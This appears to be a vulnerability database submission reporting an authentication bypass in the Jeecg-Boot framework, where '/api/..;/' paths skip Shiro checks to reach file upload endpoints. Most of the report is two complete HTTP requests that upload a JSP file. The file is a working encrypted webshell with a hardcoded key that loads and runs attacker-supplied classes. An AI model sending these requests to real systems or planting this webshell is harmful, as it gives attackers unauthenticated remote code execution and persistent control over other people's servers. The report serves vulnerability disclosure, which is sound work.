| 标题 | Jeecg-Boot Framework Remote Command Execution |
|---|
| 描述 | ## Summary
In jeecg boot framework (https://github.com/jeecgboot/jeecg-boot),
There is a vuln that can access the API of file upload by bypassing Shiro's permission authentication to realize webshell upload.
Details are as followed
## Details
HTTP Request
```http
POST /api/..;/cgUploadController.do?ajaxSaveFile&sessionId=7211DABCDAF4D0AAB731C44848F0FB6C%27, HTTP/1.1
Host: ip
Content-Length: 902
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTneEAOeZrAbfrMH4
Accept: */*
Origin: http://ip
Referer: http://ip/api/..;/systemController.do?commonUpload&_=1655456862344
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=7211DABCDAF4D0AAB731C44848F0FB6C; Hm_lvt_098e6e84ab585bf0c2e6853604192b8b=1655456211; Hm_lpvt_098e6e84ab585bf0c2e6853604192b8b=1655456442
Connection: close
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="name"
skr.jsp
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="documentTitle"
blank
------WebKitFormBoundaryTneEAOeZrAbfrMH4
Content-Disposition: form-data; name="file"; filename="skr.jsp"
Content-Type: image/jpeg
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryTneEAOeZrAbfrMH4—
```
or also hacker can use this api
```http
POST /api/..;/commonController.do?parserXml HTTP/1.1
Host: x.x.x.x:8081
Content-Length: 424
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzAtM8p8Ho292J3Vk
Accept: */*
Origin: http://x.x.x.x:8081
Referer: http://x.x.x.x:8081/api/..;/systemController.do?commonUpload&_=1655435878184
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=3D38F89CA6887B45CEFB41E4CA65A235; Hm_lvt_098e6e84ab585bf0c2e6853604192b8b=1655433472; Hm_lpvt_098e6e84ab585bf0c2e6853604192b8b=1655435715
Connection: close
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="name"
per-index-photo.png
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="documentTitle"
blank
------WebKitFormBoundaryzAtM8p8Ho292J3Vk
Content-Disposition: form-data; name="file"; filename="per-index-photo.jsp"
Content-Type: image/png
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundaryzAtM8p8Ho292J3Vk--
```
The ability to upload arbitrary files leads to the final remote command execution |
|---|
| 来源 | ⚠️ https://www.cnblogs.com/J0o1ey/p/16550583.html |
|---|
| 用户 | J0o1ey (UID 30618) |
|---|
| 提交 | 2022-08-04 08時58分 (4 年前) |
|---|
| 管理 | 2022-08-04 09時47分 (49 minutes later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 205594 [jeecg-boot /api/ 文件 权限提升] |
|---|
| 积分 | 20 |
|---|